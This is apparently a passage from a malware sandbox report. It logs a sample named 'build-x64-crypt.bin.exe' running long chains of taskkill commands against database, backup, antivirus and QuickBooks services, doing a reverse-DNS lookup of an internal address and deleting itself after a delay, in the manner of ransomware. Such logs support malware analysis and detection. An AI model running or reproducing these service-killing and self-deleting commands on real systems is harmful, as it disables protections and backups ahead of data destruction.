  2⤵
  PID:1756
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM InputPersonalization*
    3⤵
    - Kills process with taskkill
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM AdobeCollabSync*
  2⤵
  PID:1704
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AdobeCollabSync*
    3⤵
    - Kills process with taskkill
    PID:1480
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM BrCtrlCntr*
  2⤵
  PID:1968
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM BrCtrlCntr*
    3⤵
    - Kills process with taskkill
    PID:1468
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM BrCcUxSys*
  2⤵
  PID:480
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM BrCcUxSys*
    3⤵
    PID:564
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SimplyConnectionManager*
  2⤵
  PID:760
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SimplyConnectionManager*
    3⤵
    PID:1848
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  2⤵
  PID:1448
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Simply.SystemTrayIcon*
    3⤵
    PID:1316
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fbguard*
  2⤵
  PID:236
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fbguard*
    3⤵
    - Kills process with taskkill
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fbserver*
  2⤵
  PID:1932
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fbserver*
    3⤵
    PID:1844
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ONENOTEM*
  2⤵
  PID:1720
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ONENOTEM*
    3⤵
    - Kills process with taskkill
    PID:1076
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wrapper*
  2⤵
  PID:1572
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wrapper*
    3⤵
    PID:1072
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM DefWatch*
  2⤵
  PID:1984
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ccEvtMgr*
  2⤵
  PID:1044
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ccEvtMgr*
    3⤵
    PID:1752
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ccSetMgr*
  2⤵
  PID:1416
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ccSetMgr*
    3⤵
    - Kills process with taskkill
    PID:1556
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SavRoam*
  2⤵
  PID:1464
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:2040
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Sqlservr*
  2⤵
  PID:340
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Sqlservr*
    3⤵
    - Kills process with taskkill
    PID:2032
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlagent*
  2⤵
  PID:1852
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlagent*
    3⤵
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqladhlp*
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqladhlp*
    3⤵
    - Kills process with taskkill
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Culserver*
  2⤵
  PID:1304
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Culserver*
    3⤵
    - Kills process with taskkill
    PID:880
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM RTVscan*
  2⤵
  PID:204
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:208
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlbrowser*
  2⤵
  PID:600
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlbrowser*
    3⤵
    - Kills process with taskkill
    PID:1088
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLADHLP*
  2⤵
  PID:1072
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLADHLP*
    3⤵
    - Kills process with taskkill
    PID:1924
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBIDPService*
  2⤵
  PID:1928
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBIDPService*
    3⤵
    - Kills process with taskkill
    PID:1952
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  2⤵
  PID:1752
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:1532
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBCFMonitorService*
  2⤵
  PID:1556
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:1964
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlwriter*
  2⤵
  PID:2040
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlwriter*
    3⤵
    PID:1108
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM msmdsrv*
  2⤵
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msmdsrv*
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM tomcat6*
  2⤵
  PID:1804
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM tomcat6*
    3⤵
    - Kills process with taskkill
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM zhudongfangyu*
  2⤵
  PID:660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:520
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  2⤵
  PID:1068
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM vmware-usbarbitator64*
    3⤵
    - Kills process with taskkill
    PID:1096
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM vmware-converter*
  2⤵
  PID:216
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM vmware-converter*
    3⤵
    - Kills process with taskkill
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM dbsrv12*
  2⤵
  PID:1092
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM dbsrv12*
    3⤵
    - Kills process with taskkill
    PID:1568
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM dbeng8*
  2⤵
  PID:836
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM dbeng8*
    3⤵
    - Kills process with taskkill
    PID:1984
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:372
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    PID:1756
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  2⤵
  PID:336
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1416
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  2⤵
  PID:848
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1464
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLBrowser*
  2⤵
  PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLBrowser*
    3⤵
    - Kills process with taskkill
    PID:340
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLWriter*
  2⤵
  PID:1288
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLWriter*
    3⤵
    - Kills process with taskkill
    PID:1848
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM FishbowlMySQL*
  2⤵
  PID:1908
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM FishbowlMySQL*
    3⤵
    PID:1316
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:232
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MySQL57*
  2⤵
  PID:764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MySQL57*
    3⤵
    PID:1844
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1292
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    3⤵
    - Kills process with taskkill
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  2⤵
  PID:220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLServerADHelper100*
    3⤵
    - Kills process with taskkill
    PID:1896
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1920
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM msftesql-Exchange*
  2⤵
  PID:1044
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msftesql-Exchange*
    3⤵
    - Kills process with taskkill
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
  2⤵
  PID:1704
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    3⤵
    - Kills process with taskkill
    PID:1480
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
  2⤵
  PID:1968
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$SBSMONITORING*
    3⤵
    PID:1468
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
  2⤵
  PID:480
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:564
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  2⤵
  PID:760
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1432
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
  2⤵
  PID:576
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    3⤵
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
  2⤵
  PID:236
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$SBSMONITORING*
    3⤵
    PID:880
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
  2⤵
  PID:1860
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell [System.Net.Dns]::GetHostByAddress('10.7.0.38').hostname
  2⤵
  PID:1960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe" /F
  2⤵
  - Deletes itself
  PID:1304
- - C:\Windows\system32\timeout.exe
    timeout /T 15 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:208